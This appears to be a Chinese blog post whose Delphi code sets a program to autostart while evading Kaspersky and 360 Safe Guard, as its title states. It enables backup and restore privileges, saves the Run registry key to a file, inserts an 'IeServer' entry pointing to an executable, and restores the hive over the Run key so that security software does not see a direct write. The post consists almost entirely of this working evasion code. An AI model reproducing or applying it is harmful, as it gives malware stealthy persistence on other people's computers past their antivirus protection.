写程序启动项时如何过卡巴与360安全卫士等软件的方法


procedure SetPrivilege;
const
  ADJUST_PRIV = TOKEN_QUERY or TOKEN_ADJUST_PRIVILEGES;
  SHTDWN_PRIV = 'SeBackupPrivilege';
      //SeBackupPrivilege 备份文件和目录。
      //允许用户绕过文件和目录的权限来做备份。只有当应用程序尝试访问NTFS备份API时才检查这个特
      //权。默认情况下,这个特权分配给Administrators和Backup Operators。
  PRIV_SIZE = sizeOf(TTokenPrivileges);
var
  TokenPriv, Dummy: TTokenPrivileges;
  Token: THandle;
  Len: DWORD;
begin
  OpenProcessToken(GetCurrentProcess(), ADJUST_PRIV, Token);
  LookupPrivilegeValue(nil, SHTDWN_PRIV, TokenPriv.Privileges[0].Luid);
  TokenPriv.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
  TokenPriv.PrivilegeCount := 1;
  AdjustTokenPrivileges(Token, false, TokenPriv, PRIV_SIZE, Dummy, Len);
end;

procedure SetPrivilege2;
var
  TPPrev, TP: TTokenPrivileges;
  TokenHandle: THandle;
  dwRetLen: DWORD;
  lpLuid: TLargeInteger;
begin
  OpenProcessToken(GetCurrentProcess, TOKEN_ALL_ACCESS, TokenHandle);
  if (LookupPrivilegeValue(nil, 'SeRestorePrivilege', lpLuid)) then
      //SeRestorePrivilege
      //恢复文件和目录。
      //允许用户绕过文件及目录权限来恢复备份文件。默认情况下Administrators和Backup
  begin
    TP.PrivilegeCount := 1;
    TP.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
    TP.Privileges[0].Luid := lpLuid;
    AdjustTokenPrivileges(TokenHandle, False, TP, SizeOf(TPPrev), TPPrev, dwRetLen);

  end;
  CloseHandle(TokenHandle);
end;

function addreg(key: Hkey; subkey, name, value: string): boolean;
var
  regkey: hkey;
begin
  result := false;
  RegCreateKey(key, PChar(subkey), regkey);
  if
    RegSetValueEx(regkey, Pchar(name), 0, REG_EXPAND_SZ, pchar(value), length(value))
    = 0 then
    result := true;
  RegCloseKey(regkey);
end;

function SaveKey2(key: integer; subkey, filename: string): Boolean;
var
  SKey: HKEY;
begin
  SetPrivilege;
  Result := false;
  if key = 1 then begin
    RegOpenKey(HKEY_CURRENT_USER, PChar(subkey), SKey);
  end
  else
  begin
    RegOpenKey(HKEY_LOCAL_MACHINE, PChar(subkey), SKey);
  end;
  if SKey <> 0 then
  try
    Result := (RegSaveKey(SKey, PChar(FileName), nil) = ERROR_SUCCESS);
  finally
    RegCloseKey(SKey);
  end;
end;

procedure regstore2(key: integer; subkey, hfile: string);
var
  key2: hkey;
begin
  SetPrivilege2;
  if key = 1 then
  begin
    RegOpenKey(HKEY_CURRENT_USER, PChar(subkey), key2)
  end
  else begin
    RegOpenKey(HKEY_LOCAL_MACHINE, PChar(subkey), key2);
  end;
  if key2 <> 0 then RegRestoreKey(key2, PChar(hfile), 8);
  RegCloseKey(key2);
end;

procedure regstore(exefile: string);
var
  key: HKEY;
  I: Integer;
begin
  SaveKey2(2, PChar('SOFTWARE/Microsoft/Windows/CurrentVersion/Run'), 'c:/1.abc');

  RegCreateKey(HKEY_CURRENT_USER, PChar('Software/fengzi'), key);
  for i := 1 to 5 do
    regstore2(1, 'Software/fengzi', 'c:/1.abc');
  addreg(HKEY_CURRENT_USER, 'Software/fengzi', 'IeServer', exefile);

  SaveKey2(1, PChar('Software/fengzi'), 'c:/2.abc');
  for i := 1 to 5 do
    regstore2(2, PChar('SOFTWARE/Microsoft/Windows/CurrentVersion/Run'), 'c:/2.abc');

  RegDeleteKey(HKEY_CURRENT_USER, 'Software/fengzi');
  RegCloseKey(key);
  DeleteFile('c:/1.abc');
  DeleteFile('c:/2.abc');
end;

procedure TForm1.Button1Click(Sender: TObject);
begin
  regstore('c:/1.exe');
end;

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值